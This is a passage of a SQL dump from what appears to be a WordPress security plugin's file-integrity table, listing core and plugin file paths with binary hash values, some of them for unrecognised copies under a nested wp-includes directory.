]1�sP�J�T','',0,'?'),('��g*�n\'�7�M�(','wp-content/plugins/wp-cerber/assets/flags/as.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�ͫL�I�~\0j�z�','aV�u{�Y�T@�di�V�[k���:��','',0,'?'),('��}�0���XE��{','wp-content/plugins/wp-cerber/assets/flags/vn.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������Z/)��d��','�c��ԫ���M���Hw{HSa��4����͖�','',0,'?'),('�*��lw�-3ܸ*)�','wp-content/plugins/wordpress-seo/inc/class-wpseo-admin-bar-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0�#ٰS�>D\\�+LW','�QY\r��	W0?�KZ��@@a��u2n��ò�H�','',0,'?'),('�	0eϽe̎����5+','wp-content/plugins/wp-fastest-cache/templates/newpost.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'\0�QǶY;r�','~^ߣ���\na�j����xd͓\"�(!�y��','',0,'?'),('�U���b�f܌�`g','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-registered-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')���g�B�緍tP-','��n0}�{ܭ@k5��ƀ=b����a�ֲ+�n�','',0,'?'),('�kLN\0��x6@','wp-admin/css/list-tables.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�RE���k�9uu�ì5�','����&ׯk=;f%a�#щt����vG','',0,'?'),('�\"6���-���L�','wp-includes/blocks/comment-template/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�G@�KRL�=�1o,�','JTۚ=�K�Qf��*ȓ��:	3~��R�ND��','',0,'?'),('�-.��x�ɤ�R��','wp-admin/includes/privacy-tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y����ן�Cx ��','��Q�x�o�z��R*�h�Z֎�sGK{�+�','',0,'?'),('�0J����fx�#X{�','wp-includes/sodium_compat/namespaced/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�m�w�/�\\�y5�','�ɐt�d7�H�}=��.t��Cw$�`c��\'�','',0,'?'),('�4���2�)A.;4�','wp-includes/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3Q	�!�@�٧T\r','	�Z\\L���\'b�%�i$���\Z\n���F�~','',0,'?'),('�MS	n۰n���&A2 �','wp-content/plugins/wordpress-seo/src/conditionals/not-admin-ajax-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�} D1�CN�?�RB�*','��H�׎	B�Tz���C	��:DY,���','',0,'?'),('�Ov(� ���fF','wp-includes/wp-includes/js/jquery/ui/tabs.min.js',0,'�a`|��^(=`��hv','�a`|��^(=`��hv','L�.X_	�DJ��tk��H��!|��ݔJ��x','',0,'?'),('�Q�A�	�=H��7-','wp-includes/js/jquery/ui/droppable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\v�rK�S9L��\0i\0-','G�A�b<�\\A�={A}:J`��L���C��?L','',0,'?'),('�]�A=���l�:���x�','wp-content/plugins/wp-cerber/assets/flags/cn.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=Ӱy������ss',',\Z ,�r�v]7��@1s�P�\0\0k��!��','',0,'?'),('�d\n�v;�O1:���,Tn','wp-content/plugins/wordfence/views/options/option-toggled-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��о�6������','r�\nz���>���g�i��\ru��u<��F','',0,'?'),('�r@��D��Z�䯩','wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!K�	5y���S*','���Ty�O�%u;�U�}�g�1��)��Z�','',0,'?'),('�~#I��3\r_�����','wp-content/plugins/wordpress-seo/src/presenters/admin/alert-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|�r�Ծԕ�5��','\Z��/�Z�	)DTDs�P���\0O3k�M��M','',0,'?'),('�V9o�C��*R�U��','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-location-control.php',0,'��U!��s^�7�L','��U!��s^�7�L',';��lϓ�b^�����0�(�@�L�#B��','',0,'?'),('ꍥ��2jEbg؈W�x�','wp-includes/css/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2�aQm���X<Q','\Z�u�a�f��F�›s�\"��&Ѧ�a3��J�i2','',0,'?'),('��M�uÞZh���ӷ','wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-modified-time-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s��n���^���O','�1���(!&�;%k>L�aa�_:�\\к�r(','',0,'?'),('꤂�,o׫�Co��):','wp-includes/wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php',0,'�y^�������','�y^�������','Y	Q�FX��2�2�FW���)���fKSf�','',0,'?'),('ꮔ��<���,Z�','wp-includes/blocks/comments-pagination/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�6����_�r%,��','��X���������06�\0,�8�����Ӄ��','',0,'?'),('�LJ���4˓T`�k','wp-includes/js/wp-pointer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AV{M���rn?�\n�','c:���8��Xܹ�l�8od�Gh��S�D�%\nM�','',0,'?'),('���`I��,�y o�Y','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8e_�T��ƽW','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('��6�Z�fM���;�','wp-admin/css/site-health-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ������(u�\r�','\n\ZV�����p�;��tFu�\'�����\"���','',0,'?'),('�\njݍea!�\ZWd�q','wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ٶ��h�rdG�Ͷ','�_7�	2w-Tb�	-��710εA����f','',0,'?'),('��!a����%*��Ԕ','wp-content/plugins/all-in-one-wp-security-and-firewall/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' S$w9�8w�R��','A��뛭W-Wd}�fB�(1��d񝿭ש�H_X�','',0,'?'),('�-n�$.�#g%�}�','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �OّCH�ؖs� ','pX���uc{�-�K׏ژ�/OnE0���)JB','',0,'?'),('�0���R�J�{y�ˣ��','wp-includes/general-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YVt�vK����E��>','�S�ρy�����������P	˲�QI�W','',0,'?'),('�8Us� �_��.1Rj','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',0,'�\0��>��@Ue��U','�\0��>��@Ue��U','�țp���˄o<��O\n��Oo{�w=�S','',0,'?'),('�BE���|$!���5','wp-content/plugins/wordpress-seo/src/presentations/indexable-author-archive-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�M״�sˤ�\'�','�{8Cg�(�:y&E�V<ճ���r<޵','',0,'?'),('�F �8�+�)��r�P�','wp-admin/images/no.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k�d�$��ܟV7�','\n�>���~h�Z���P\0�U0�;\' {�)	�>','',0,'?'),('�M\Z���H�?ͲZ','wp-includes/class-wp-rewrite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��GmhE�*�T��+','ݥ+Hw5a�fdj��1�%x�a�\'�OD��6','',0,'?'),('�Oӿ�;�=\\J�zy','wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!��e/���Nz9�i','��3�*|��Lg����3>m!��V��$8','',0,'?'),('�QF�0t�+�����','wp-includes/css/dist/block-library/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�%�AS��7��H�','�D�����\0lB�7+ S�>�BX��ݸ��3','',0,'?'),('�_�1t=qT�Q�*�F�','wp-includes/blocks/gallery/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H�:�;��MA�!��','��dV�aZh���н����Qf�{�z,E�','',0,'?'),('�a��u\"9s?�H����','wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%1�s���ËG','E��Wٳ�?�4��@U?�0���bP�+�h','',0,'?'),('�fS/\\�����R�O�','wp-includes/wp-includes/js/customize-preview-nav-menus.js',0,'m �l�VҪ3���','m �l�VҪ3���','�5,��M3�5��n(tL5��;^��P/9z���8','',0,'?'),('�m+:o]���au�{��','wp-content/themes/twentytwentythree/styles/grapes.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','팩 ?R,�UM��(�','��D��o��%�\0�_;�/����\")����[','',0,'?'),('�u�̽�[�abٌ(��]','wp-includes/wp-includes/formatting.php',0,'��H(@q���Tj��','��H(@q���Tj��','�g��\n?#��\'^�\'d�8�\Zi��=\Z������','',0,'?'),('���t�\\��}\rk���','wp-content/plugins/wordpress-seo/admin/views/class-yoast-feature-toggle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wF8B���v���\r/','7�\"��=������s��>G�1,�7ktfL','',0,'?'),('�x�D�.���m~<�2','wp-content/plugins/wordfence/images/ratelimiting.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0[��M�ɞ�yP��','�@����S��y\'�N+�k�B��3�J!PbƖ�','',0,'?'),('��f���婿I��','wp-content/plugins/wp-smushit/app/assets/js/smush-lazy-load-native.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/l��hZ|Ϡ��','CÖ�d��%�q��\n~���L�`џ�]����','',0,'?'),('둪�\09܎�R�yg��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Handler/CurlMultiHandler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zo�η�v�u�	n�4G','����@�݃�J�\"�#U�&�h�A�T���','',0,'?'),('��L����M��','wp-includes/blocks/comments-title/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�|�v�ʡ����,�T','	[�W��N&��a��-�(��C�E��\0�P','',0,'?'),('��k<������#���','wp-content/themes/hitmag/template-parts/authorbox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q|�ҿ�%>������','̰l�(\0���ڵ*�+(��ωz�d���\Z��_','',0,'?'),('�6�\'���� �b','wp-includes/wp-includes/images/smilies/simple-smile.png',0,'�K��{…��f�w�h','�K��{…��f�w�h','�?Y�ag\\�<y����0\01��8�3��H�g','',0,'?'),('뭷\r�!z}ML�K�E','wp-includes/ms-files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8��〖z��ޝ	�','�4?X�q�)�����̃�cfN3.y�����','',0,'?'),('��Sڰp��GMǯ�l�','wp-includes/css/media-views.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r���V��I�\n���z��','���B^s���6���5baQ�\0 �i=J:','',0,'?'),('�2�|�?�]���ϸ�','wp-includes/css/dist/nux/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\Z61ԗ��?�\ZչV�','����-�D0xV_4]m�80F���=?�u�','',0,'?'),('���׮F��p�s��4�','wp-content/plugins/wordfence/images/back_enabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���]����H��','���9퇥)R�$px#��q ������{#L�O�','',0,'?'),('��f&��X��\'{&��((','wp-content/plugins/wp-cerber/assets/flags/jo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ۣŃ�\'��R=)�','`R��O3Uiҥ��4�S�YdƏҩ�i�m�','',0,'?'),('�Њtf�P�E+���','wp-includes/wp-includes/js/wp-ajax-response.js',0,'r�Hme_\Z��!5','r�Hme_\Z��!5','��c�����z�2�~;~�D��*T�?�&�','',0,'?'),('���iW;`��B�<+','wp-content/themes/twentytwentythree/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�*{a�D�#䵯 �','�����]iG���H���M,]�ulJ��(','',0,'?'),('�֍[1���땰5E�','wp-content/plugins/wordpress-seo/src/conditionals/third-party/elementor-edit-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�v�$���)���','�-�Uy�b�!IuK��]Z�0�*�yf�5�a','',0,'?'),('��ԖNF��:�1<x�','wp-includes/wp-includes/images/smilies/icon_sad.gif',0,'�Ix�o��TMz��D-','�Ix�o��TMz��D-','�b5�yh�9���}���o��W�I��n�n�','',0,'?'),('��vA�ds�����K�]','wp-admin/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݗ1��\0�\0�W*�`���','X��N�=re]�$���-�Sm3�ѩ��','',0,'?'),('��YC��o�oR�亞�','wp-includes/capabilities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����S��o7xF�AE�','$5��+�u>�B��.�j6�����#�q���Zx','',0,'?'),('��X��&(!�;5���','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/eu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%pDZ�i]�*����','NC��Ohm�#�f#m�)��`��rd�F�Ȋf','',0,'?'),('��:M�e~i����','wp-content/plugins/wp-cerber/assets/flags/pn.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dGO����je��N*��','h�m�l��g�a� O��T/��;��jV�^�','',0,'?'),('�+>B\"W T�(z\\�','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php',0,'N�+C#+|�fZ���]�','N�+C#+|�fZ���]�','kn\Zy�&��_��[��Igl�(�g\'�^�G','',0,'?'),('�ۅnPE6��T����','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/Request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��KdW���ؿE�W��','�R��W].da����s��JM�Lq+p�},�','',0,'?'),('���.㵓~�X�ѹ7�','wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-cache-validator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0JJɷr}�8�Yu�',';��i��ؼR���C��?���.�ۭ\neO','',0,'?'),('�`����}Sm�\'r','wp-content/plugins/wordpress-seo/src/integrations/admin/import-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʶׁ�ҠH�+�¨�','��w�ݼB�<���F�=�7�[��I7����','',0,'?'),('� ��p(邊�ȼ�a��','wp-includes/blocks/navigation/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d����/\Z�N8J#J�P','�p�v�]\n��{��x�W�l�I5��6#9�5\\n�I','',0,'?'),('�8�ڧ��s}�ն�Ni','wp-includes/class-phpmailer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��F!;� 2󱻱4�&','G��ZG����5�_ܚ��XS[W��S:9p@�?�','',0,'?'),('�?����h�����;','wp-includes/js/quicktags.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʵ��>	%�nK�{<5','mwd���^ʋ�\r��1�^K��(<nV����','',0,'?'),('�D\rh}�����!\n','wp-includes/js/jquery/ui/effect-drop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���UZJ�v:Ѕ�&','c��K��5��޸W��l5�߈�^��z�I4 ��','',0,'?'),('�MX�?�\n�(�\"�','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-ko_KR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r�{{�բw%gYp�','�+X҆>hp\\M�i�S�	2���t�]��f��','',0,'?'),('�M���[�l$��c�','wp-content/plugins/wp-smushit/app/assets/images/plugins-defender-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r��M��Zȶ�]','�B2�|�\rs�rA��wa�`����V�?yE{�','',0,'?'),('�P<��h��l�RA','wp-includes/blocks/list-item/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�Ξ��\Zo�a�8�w','r����i�0ڟ�@�L��\0�)��1`���z�	�','',0,'?'),('�Pط��悇̺ƴ$@�','wp-includes/SimplePie/HTTP/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P0�ش�57�,��	z','���&�b�B筢�0�9�Z/�|�1���p��','',0,'?'),('�T��@a�J��QZ\"��F','wp-content/plugins/wordpress-seo/src/conditionals/wincher-token-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b8挚�J��&','m���մ2\'O���?�v��N�qx%�4V�','',0,'?'),('�V���A`\"�1=�i','wp-content/plugins/redirection/modules/nginx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߭h�����[Ix�X5','��9s�ǖ\r���\"�Ě�Q��Mv!���-��','',0,'?'),('�j���p\'*T��)�ãB','wp-includes/wp-includes/js/customize-preview.js',0,'3Q	�!�@�٧T\r','3Q	�!�@�٧T\r','	�Z\\L���\'b�%�i$���\Z\n���F�~','',0,'?'),('�{VcR��>�ԈA��','wp-includes/blocks/code/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rAq�O��Эx�_�P','���뜷H�B�?����O���4��z�\'\n�4�','',0,'?'),('�}(^��8,~hyg���','wp-content/plugins/wp-cerber/wp-cerber.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S7���|l�?.��0)','�����U�!�\n��M���ss�lM����ό)','',0,'?'),('�b5A�b�\r�$�#;9','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/PumpStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*|�\n2�O��	vW|','��O��6����9R�0�(������7>�{� .T�','',0,'?'),('�j\n$��}���','wp-content/plugins/wp-fastest-cache/templates/cdn/specify_sources.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�*���Z�L�3���','EL�qT�cZ�ߦ��,�>������GL�Io��a','',0,'?'),('��c��.D�r� |��','wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R���Z�?f.��8��	','��.c%�c�*G~�բ>�Yd���:�7�j','',0,'?'),('�\\��{5-B�l�.y&','wp-content/plugins/wp-smushit/app/modals/directory-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���*$,q�+s�s�','A�T���L@@�swP�[��.�Q=','',0,'?'),('츃�v��6�;�~�','wp-includes/js/tinymce/utils/mctabs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','끡�\"Y����>xU季','%�Y}ڿ�&)���MaYg��Ѝ���*�l�','',0,'?'),('��!<����B4\ZS�}','wp-content/plugins/wordfence/views/scanner/issue-postBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����le�@1��-�','��+	[P\r�i-��b0m����ƥ�M\"�#��@','',0,'?'),('�[���Ӄ��2�W','wp-content/plugins/wordfence/views/waf/options-group-basic-firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[><\r�w���w�ɴ','���T;��F����5@>X�s�F�#�&�$','',0,'?'),('�-x�(�E�oI�=�','wp-includes/class-wp-customize-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���*�Ec!�4a��k','�����s\Z��a�	Ig�|�rx�2������','',0,'?'),('�﹍0If��\r?�K','wp-includes/wp-includes/js/dist/server-side-render.min.js',0,'6�o�i)=�\"p�Jhl','6�o�i)=�\"p�Jhl','m��z��}ힳ�M��|N�b����Zi�-','',0,'?'),('���9�+�K��*','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/ServerRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ka�^�Cj�D�p��','���K���lD%$w� ̜�~q�+��0gH���','',0,'?'),('�Ư��0~\rjA4u','wp-includes/css/customize-preview-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E��?��nZ���d�-','G���i�\rl�iU^��n��rm�5��Ώۻ�\\l�','',0,'?'),('�\0�Z{���@�C\\�','wp-includes/wp-includes/images/smilies/icon_cool.gif',0,'\n��`����ivj.�','\n��`����ivj.�','�事F�9;2_	�$�$~�LO�a��6���_','',0,'?'),('�\\�S�Շ��8��;2','wp-includes/class-wp-tax-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ф��k�X��','�x6WJ�ϼ`?�iP��\\�:�{<OZ�^','',0,'?'),('���mה��F@$�~r','wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w|q��M�+{3,�K�#','�_�t��=�ԑ��G0ɽ*�67����t���*s','',0,'?'),('�\'tPRt���\0��|?X','wp-content/plugins/wordpress-seo/images/brushstroke_background.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n>\n����8��','��[��3*�X����٬+`6���F����a�m','',0,'?'),('�+�2٢����ƕU���','wp-content/themes/hitmag/inc/kirki/lib/class-kirki-color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�����vC����','��;%�\'Wk}�����j����@ޱ�ox\\)�','',0,'?'),('�4����E\"\nmB*ȇ','wp-content/plugins/redirection/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"9��sF:�t�\rG��','���F�}�Ռ���O�X����	#����#�','',0,'?'),('�LX=8�k�jTB]�','wp-includes/wp-includes/js/twemoji.js',0,'ޮ��!�P��+!�x�','ޮ��!�P��+!�x�','���Q���ӫ��q��6uN�󗬏','',0,'?'),('�N��\'�!\rB�j��3�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\H��!#���>b�W��','�&�x��w�α�h��)�œ@5m��.)9�R','',0,'?'),('�]��@�\n��>ĺ�Yn','wp-admin/admin-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:��%��P�w���','Z��d�z�##D��6�8��\"U�����\09�x','',0,'?'),('�k.�OjM�S��ß','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-ancestor-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r\"!CX����b~�i','����*Z̸�Kzb|�� �϶��=�x2/','',0,'?'),('�~-��\0=�3���B��','wp-content/plugins/wordpress-seo/css/dist/yoast-components-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t�s���j�*f�j','����)�N\nl%m(b�./��dOE��ڢ�-i�L','',0,'?'),('���I0��B,�hʛp','wp-includes/class-wp-term-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�/��9N\"�q2���','�¯��k����90��\\+���� �\Z[�','',0,'?'),('�>LT��Ơ�z#Pkó','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Exception/TransferException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Y�z�c�(�pc^\n','�\Z�k|�!�`mS8KW������|fo?��,;','',0,'?'),('�������賮]','wp-includes/customize/class-wp-customize-code-editor-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jM�і���lM��_','�xFZ�Kc��3�7�`Ԫ$j�g�]�Q��','',0,'?'),('�Z�\Z�5\n�j�}�@','wp-includes/blocks/buttons/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�?1&��r�\r�?�','�b	��4��Y�z��8����N:�\\O;','',0,'?'),('�F�����m���','wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|<��>sZ�K�z�e','�̆;�n�E��!��Z�\ZV��V H��w','',0,'?'),('�Z�\ZaYH\0 �5�~ ','wp-admin/includes/class-wp-automatic-updater.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K���`��(�P��','ߚ� ����t�\\KA�VD�8��P��o&��i�','',0,'?'),('���@�g�^}u�d	','wp-content/themes/hitmag/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ia쓂���;_�\\ϵ','�g�<`%��U/p,}�#H�.Ɉx*�%�g�','',0,'?'),('�QR\"��@3��v�S','wp-admin/js/link.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','϶�5���֞��P�','O�n��n���˕�{?���Q!�=����V�oi��','',0,'?'),('�(\"A���S^�','wp-content/plugins/redirection/locale/json/redirection-gl_ES.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#q��G)���&VOq�*','z]&�%�x,���ֹ��{n�n��DXV�b��','',0,'?'),('�G� ��~���`�','wp-includes/customize/class-wp-customize-nav-menu-name-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7�f�W�՚7���','p��v�w ��ܪ9����?���a���z�','',0,'?'),('��U��E�Kڂ*�U','wp-includes/blocks/gallery/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=��燬p�T��Z�L�','X21�T@,koj�ه{�LDV���sNP��e�','',0,'?'),('��\Za�]]�A��\'h���','wp-admin/network/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'�:��v:2X-C��','�Q�}ZK\0R6��BoNG�⣹2U�`���Π','',0,'?'),('����=�c�ه���','wp-admin/includes/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	��D,�@�-���x','\"\n�����G߼ə��\Z��o�A��U�','',0,'?'),('��.�}�b8����5i','wp-includes/wp-includes/sodium_compat/src/File.php',0,'c�]-�@W�\\0��Wv','c�]-�@W�\\0��Wv','�c`�C(ߛ�V�S6ب�c�s�u8�6��l','',0,'?'),('��eC����Di!��','wp-admin/css/colors/coffee/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�9VV���ͣ�P��','�����a�q�����A�:V嫽�>�F�','',0,'?'),('���f�%u�P���','wp-includes/js/mce-view.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\(�.�\"�h�ƀ�','�7O9���I\Z�B����0��Z]ԧ&��\'��$�','',0,'?'),('�\Z���{:\Z���4f','wp-includes/js/customize-preview-nav-menus.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m �l�VҪ3���','�5,��M3�5��n(tL5��;^��P/9z���8','',0,'?'),('�!�mm��f���\r���','wp-content/plugins/wordpress-seo/src/actions/importing/importing-action-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ak-�?���8�@$��','�=���XG��MS�;�D��AP��o\0��','',0,'?'),('�.�z��&���.�1y��','wp-includes/css/dist/format-library/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/I��8):�ct��|','!%��r��kXɾF!�\"7�1��a��;��j�U�\"','',0,'?'),('�?kb���x�_�J��M�','wp-includes/blocks/comments/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1��(+���\r8O\Z�','�.�An�Bl�Cjq�W�sS����Mq*��q','',0,'?'),('�d`W��q���&�m�','wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/indexable-prepare-indexation-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Bl.l}��X̱0���','l~�P�n׀y�%KSV�`[s��m`�3/Kt�Z�','',0,'?'),('�iZ��@>\\�7^','wp-content/plugins/wp-fastest-cache/images/icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4#;���J�9��i�','����hφ	��ذX��^6�@(�{\Zږn','',0,'?'),('�k-§#���^��VU','wp-includes/wp-includes/js/dist/plugins.js',0,'OBb�?�Ɖ�х��','OBb�?�Ɖ�х��','�[��ɉ��NN�^p��D_S��r�pI~8,�v','',0,'?'),('Y��w�;mU5-��','wp-includes/wp-includes/compat.php',0,'	��}�as�	����?�w','	��}�as�	����?�w','��K���yc��TsKfsb{���-	